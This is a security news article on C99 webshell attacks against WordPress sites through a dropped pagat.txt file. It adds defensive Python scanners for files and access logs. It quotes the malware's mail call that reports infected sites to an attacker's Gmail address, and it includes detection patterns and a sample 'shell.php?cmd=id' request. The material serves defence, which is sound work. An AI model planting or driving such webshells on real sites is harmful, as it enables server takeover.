IBM's Managed Security Services (MSS) team recently issued a warning that it has observed a new wave of attacks against a large number of WordPress sites using the C99 PHP webshell, and reminded WordPress site administrators to scan for and patch site vulnerabilities promptly.
Based on the IBM MSS team's long-term monitoring and analysis of malicious events, its researchers found that over the past two months there has been a class of traffic anomalies caused by C99 webshells: 404 events were recorded in February and 588 in March.
A webshell lets an attacker upload files to a web server or pass commands to it for execution. Webshells can be written in many languages, from PHP to ASP and from JavaScript to Ruby, and they give the attacker control of the server; C99 is one of the webshells attackers use most often.
Beware of pagat.txt files
According to the IBM MSS security team, attackers typically exploit vulnerabilities in site plugins to infect sites with the C99 webshell. In the initial infection phase, the webshell script is uploaded to the server and stored as a text file, which according to the study is usually named pagat.txt. IBM's researchers found obfuscated PHP source code inside this file.
To make the code harder to read and the infection harder to detect, the attacker does not place this text file in the server's web root or in the plugin's own directory. In most cases pagat.txt is stored at the following path:
"Http://www.website-name.com/wp-content/themes/twentythirteen/pagat.txt"
You can check your own WordPress server at this path (and the equivalent path under other theme directories) for suspicious files.
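The check above can be automated. The following Python script is an added example, not code from the IBM report or from this article: it walks a WordPress install, flags any file named pagat.txt, and also flags .txt and .php files containing the idioms the article describes (eval over base64_decode or gzinflate, a PHP open tag inside a .txt file, or the "Hasil Bajakan" mail string). The regular expressions, the directory names and the sample tree it builds are constructed for the example.

```python
"""Scan a WordPress tree for the pagat.txt drop and for obfuscated PHP in text files.

Added example (not from the IBM/FreeBuf article). The drop name and the
signatures are taken from the indicators described in the article; the
sample directory tree is constructed here so the script runs offline.
"""
import os
import re
import tempfile

DROP_NAME = "pagat.txt"
# Constructed signatures for the idioms the article mentions.
SIGNATURES = {
    "eval_base64": re.compile(rb"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "hasil_bajakan": re.compile(rb"Hasil\s+Bajakan", re.I),
    "php_in_text": re.compile(rb"<\?php", re.I),  # a PHP tag has no business in a .txt file
}
EXTENSIONS = (".txt", ".php")


def scan_file(path):
    """Return the list of indicator names that fire on one file."""
    hits = []
    if os.path.basename(path).lower() == DROP_NAME:
        hits.append("drop_name")
    with open(path, "rb") as fh:
        data = fh.read(1 << 20)  # the first MiB is enough for a webshell loader
    for name, pattern in SIGNATURES.items():
        if name == "php_in_text" and not path.lower().endswith(".txt"):
            continue  # PHP tags are expected in .php files
        if pattern.search(data):
            hits.append(name)
    return hits


def scan_tree(root):
    """Walk a WordPress install; return {relative_path: [indicators]} for flagged files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(EXTENSIONS):
                continue
            full = os.path.join(dirpath, fname)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings


def build_sample_site():
    """Constructed sample tree: clean theme files, the pagat.txt drop, and a dropped mailer."""
    root = tempfile.mkdtemp(prefix="wp-")

    def put(rel, content):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)

    put("wp-content/themes/twentythirteen/index.php", b"<?php get_header(); ?>\n")
    put("wp-content/themes/twentythirteen/readme.txt", b"Twenty Thirteen theme\n")
    # Stand-in for the obfuscated loader; the base64 payload here is just 'hello'.
    put("wp-content/themes/twentythirteen/pagat.txt",
        b"<?php eval(base64_decode('aGVsbG8='));")
    put("wp-content/uploads/2016/04/form.php",
        b"<?php mail('x@gmail.com', $body, \"Hasil Bajakan hxxp://$web\");")
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, hits in sorted(scan_tree(site).items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a real install with `scan_tree("/var/www/html")` instead of the sample tree; anything it flags under wp-content/themes or wp-content/uploads deserves a manual look, since neither directory should contain executable loaders in text files.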
Attack steps
The attacker first finds a way to feed the contents of the text file to the server's PHP interpreter (in the cases studied, through a vulnerable plugin). Once the malicious code executes, it typically performs the following actions.
First, it sends an email to the attacker reporting where the infected site is. The message goes to a Gmail address and contains the site's domain name and the URL of the webshell:
Mail ("XXXXX@gmail.com", "$body", "Hasil Bajakan hxxp://$web $inj
Next, the code contained in pagat.txt creates a form page in the site's directory.
Finally, the attacker opens the newly created form file in a browser and uses it to run commands or upload files to the server.
Through this webshell the attacker can run terminal commands on the server or upload new files to the site, and those new files may be more capable webshells, DDoS clients, Bitcoin mining software or other malware.
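The attack steps above leave traces in the web server's access log: the request that fetches pagat.txt, and the browser traffic that drives the dropped form page. The following Python script is an added example, not part of the original article, that applies three rules to combined-format log lines: any request for pagat.txt, any request for a .php file under wp-content/uploads/ (where PHP should never be served), and POST requests to a .php file under wp-content/themes/ or wp-content/uploads/. The directory list and the sample log lines are constructed for the example.

```python
"""Flag webshell-related requests in Apache/Nginx combined-format access logs.

Added example, not from the article. The rules follow the attack steps
described above; the directory list and the log lines are constructed.
"""
import re

# combined format: ip - - [time] "METHOD /path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Assumed: the web-writable directories where a dropped form page would live.
CONTENT_DIRS = ("/wp-content/themes/", "/wp-content/uploads/")
UPLOADS_DIR = "/wp-content/uploads/"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["path"] = entry["path"].split("?", 1)[0]  # drop the query string
    return entry


def classify(entry):
    """Return an alert name for a parsed entry, or None if nothing fires."""
    path = entry["path"].lower()
    if path.endswith("/pagat.txt"):
        return "pagat_txt_request"
    if path.endswith(".php") and path.startswith(UPLOADS_DIR):
        return "php_under_uploads"
    if entry["method"] == "POST" and path.endswith(".php") and path.startswith(CONTENT_DIRS):
        return "post_to_php_in_content_dir"
    return None


def scan_log(lines):
    """Return (ip, method, path, alert) tuples for every line that fires a rule."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        alert = classify(entry)
        if alert:
            alerts.append((entry["ip"], entry["method"], entry["path"], alert))
    return alerts


# Constructed sample: one attacker host fetches the drop, drives a form page and a
# shell in uploads; one ordinary visitor browses the site and uses admin-ajax.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Apr/2016:10:01:02 +0000] "GET /wp-content/themes/twentythirteen/pagat.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Apr/2016:10:01:09 +0000] "POST /wp-content/themes/twentythirteen/form.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Apr/2016:10:02:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Apr/2016:10:02:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Apr/2016:10:03:10 +0000] "GET /wp-content/uploads/2016/04/shell.php?cmd=id HTTP/1.1" 200 330 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, method, path, alert in scan_log(SAMPLE_LOG):
        print(f"{alert:28s} {ip:15s} {method:5s} {path}")
```

On a real server, feed it the lines of access.log and group the alerts by client address; the same host fetching pagat.txt and then POSTing to a theme or uploads PHP file is the sequence the article describes.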
According to the IBM MSS team, as of April 12, 2016 a simple Google search alone turned up about 32,000 pagat.txt files on WordPress sites.
Security recommendations
Given the current situation, site administrators are advised to take the following steps:
1. Restrict dangerous PHP functions in php.ini. The original recommendation is to find the "disable_functions =" line and set it to "disable_functions = eval,base64_decode,gzinflate". Two caveats: eval is a language construct rather than a function, so listing it in disable_functions has no effect, and base64_decode and gzinflate are used by legitimate plugins and themes, so test the change on a staging copy before applying it in production.
2. Change the name of the upload folder. WordPress allows the uploader to write files into the uploads folder; if the default name is kept, an attacker can easily guess the path of an uploaded file, so renaming it makes uploading and then reaching a PHP file containing a shell harder. This is obscurity only; a more robust measure is to configure the web server not to execute PHP from the uploads directory at all.
3. Install a well-maintained security plugin, such as Wordfence for WordPress.
4. Run security scans. Use open-source tools: ModSecurity (a web application firewall) to inspect uploads and requests, and a vulnerability scanner such as Acunetix (AWVS) or a WordPress-specific scanner to find vulnerabilities early, then patch and harden.
5. If the site is found to be infected, remove the webshell and any files it dropped, patch the vulnerable plugin that let it in, change the passwords of all administrative accounts promptly, and tell the site's users to change their passwords.
* Sources: Softpedia, SecurityIntelligence. Compiled by FreeBuf editor Troy; when reproducing, please credit FreeBuf (freebuf.com).